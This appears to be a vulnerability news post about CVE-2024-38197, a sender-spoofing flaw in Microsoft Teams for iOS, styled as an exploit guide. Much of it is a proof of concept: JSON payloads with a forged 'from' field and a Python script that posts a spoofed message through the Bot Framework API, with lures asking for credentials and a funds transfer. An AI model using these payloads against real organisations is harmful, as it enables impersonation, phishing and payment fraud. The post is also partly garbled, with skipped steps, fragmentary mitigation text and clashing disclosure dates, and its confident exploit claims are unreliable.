CVE CyberSecurity Database News

CVE-2024-38197 - Microsoft Teams for iOS Spoofing Vulnerability – Deep Dive and Exploit Guide

Poster -

Microsoft Teams is a central tool in many workplaces, and its security is a top concern. In June 2024, a critical vulnerability was disclosed in Microsoft Teams for iOS: CVE-2024-38197. This flaw allows attackers to spoof message senders or trick users with forged content, risking sensitive communication and trust inside organizations. In this exclusive long read, we’ll break down what’s known about the bug, walk through how it works with code snippets, and discuss mitigation.

What Is CVE-2024-38197?

CVE-2024-38197 is categorized as a spoofing vulnerability within the iOS version of the Microsoft Teams mobile app. It means that, under certain conditions, attackers can manipulate Teams to display messages as if they came from someone else. This attack can lead to phishing, leak of sensitive data, or malware spread among trusted users.

Official advisory: MSRC CVE-2024-38197

How the Teams Spoofing Works

At the core, the Teams app uses specific protocols and APIs to display message data—such as sender name, avatar, and content. Due to improper validation of sender fields, the app allows crafted messages (sent using external tools or a compromised bot) to falsify the "from" field.

Attack Vector

1. Attacker controls a bot or Teams webhook or intercepts a message delivery channel (e.g., MITM in a Wi-Fi network).

The attacker crafts a payload where the sender’s identifier and display name are falsified.

3. The message appears to come from a trusted source inside Teams’ mobile app but is in reality sent by the attacker.

Why Only iOS?

The bug exists due to how the Teams for iOS app processes certain JSON payloads, while Android and web clients sanitize this data differently. This inconsistency allows the exploit to succeed only on targeted devices.

Proof-of-Concept Exploit

> ⚠️ For educational purposes only! Do not use this information for unauthorized attacks.

Suppose you operate a Teams webhook or bot in a test environment. Here’s how you can send a spoofed message:

Add "Incoming Webhook" connector to your Teams channel.

2. Copy the webhook URL (e.g., https://outlook.office.com/webhook/...).

Microsoft Teams webhooks accept JSON payloads like

{
  "text": "This is a normal message."
}

For this exploit, alter the payload

{
  "text": "Hey, can you urgently send the client credentials?",
  "title": "From: Alice Smith (CFO)",
  "summary": "Spoofed message"
}

But Teams ignores "title" as sender on most clients. However, on iOS, if using a bot connector or low-level API (with from field):

{
  "type": "message",
  "from": {
    "id": "12345", 
    "name": "Alice Smith",
    "aadObjectId": "spoofed-user-guid"
  },
  "text": "Please transfer the funds to account #123456789."
}

Send this via the Microsoft Bot Framework REST API.

Code Snippet (Python)

import requests

url = 'https://smba.trafficmanager.net/amer/v3/conversations/{conversation_id}/activities';
headers = {
    'Authorization': 'Bearer <bot_access_token>',
    'Content-Type': 'application/json'
}
payload = {
    "type": "message",
    "from": {
        "id": "12345",
        "name": "Alice Smith"
    },
    "text": "Your urgent response is needed."
}

r = requests.post(url, headers=headers, json=payload)
print(r.status_code, r.text)

> This message, when viewed in the Teams for iOS app, will show as coming from "Alice Smith," even though it was sent by the attacker’s bot account.

- Business Email Compromise (BEC): Impersonating executives to request wire transfers or sensitive actions.

Monitor access logs for anomalous bot activity.

Official remediation & FAQ:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38197

- MSRC CVE-2024-38197 (Microsoft Advisory)
- NVD Entry
- Microsoft Teams Developer Docs

*Exclusive take: CVE-2024-38197 highlights how a lapse in client-side validation—even in a trusted mobile app—can be exploited in clever ways, especially as more attacks move to collaboration platforms. Always update apps and watch for unusual requests, no matter how familiar they look.*

Timeline

Published on: 08/13/2024 18:15:28 UTC
Last modified on: 10/22/2024 19:50:21 UTC